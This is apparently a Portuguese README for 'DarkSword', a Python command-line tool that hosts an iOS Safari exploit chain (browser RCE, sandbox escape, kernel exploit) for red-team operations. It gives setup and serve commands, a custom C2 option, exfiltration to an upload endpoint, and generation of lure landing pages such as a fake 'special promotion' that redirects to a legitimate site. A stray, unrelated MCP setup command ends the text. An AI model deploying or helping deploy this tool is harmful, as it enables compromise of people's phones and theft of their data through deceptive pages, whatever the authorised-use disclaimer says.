Framework Python com CLI para entrega da cadeia de exploits DarkSword em operações de red team. Baseado nos repositórios DarkSword-RCE e darksword-kexploit.
Aviso: Use apenas em ambientes autorizados. Operações de red team requerem autorização formal.
git clone https://github.com/bhideki/darksword.git
cd darksword
pip install -e .
darksword serve
Acesse de um dispositivo iOS (Safari): http://<SEU_IP>:8080/
Payloads e kexploit ja incluidos. Para atualizar: darksword sync e darksword sync-kexploit
| Comando | Descrição |
|---|---|
darksword serve |
Inicia servidor HTTP para entrega dos exploits |
darksword sync |
Baixa payloads do repositório DarkSword-RCE |
darksword list |
Lista payloads disponíveis localmente |
darksword info |
Exibe informações sobre a cadeia e CVEs |
darksword template generate |
Gera landing page personalizada |
darksword template list |
Lista templates disponíveis |
darksword sync-kexploit |
Baixa kernel exploit (opa334, Objective-C) |
servedarksword serve -H 0.0.0.0 -p 8080
darksword serve -p 8443 --c2-host https://seu-c2.com/payload
-H, --host: Host (padrão: 0.0.0.0)-p, --port: Porta (padrão: 8080)--c2-host: C2 customizado (ex: http://seu-ip:8080) - sobrescreve host/porta no pe_main.js--redirect: URL de redirecionamento em fallbackSem --c2-host, o host/porta sao obtidos do Host header (mesmo servidor). Dados exfiltrados vao para exfil/ e POST /upload.
darksword template generate --title "Promoção Especial" --redirect https://site-legitimo.com
DarkSword/
├── darksword/ # Modulo Python
│ ├── cli.py # CLI principal
│ ├── server.py # Servidor HTTP
│ ├── payloads.py # Sync e gestao de payloads
│ └── config.py
├── payloads/ # Payloads Web (apos darksword sync)
├── templates/ # Templates de landing page
├── kexploit/ # Kernel exploit Obj-C (apos darksword sync-kexploit)
├── pyproject.toml
└── README.md
| Repo | Arquivos |
|---|---|
| htimesnine/DarkSword-RCE | index.html, frame.html, rce_loader.js, rce_module.js, rce_worker.js, sbx*.js, pe_main.js |
| ghh-jb/DarkSword | Identico (fallback) |
| opa334/darksword-kexploit | Makefile, src/main.m, entitlements.plist |
| Nao publico | rce_worker_18.7.js (iOS 18.7) |
MIT - Apenas para fins educacionais e de testes de segurança autorizados.
$ claude mcp add darksword \
-- python -m otcore.mcp_server <graph>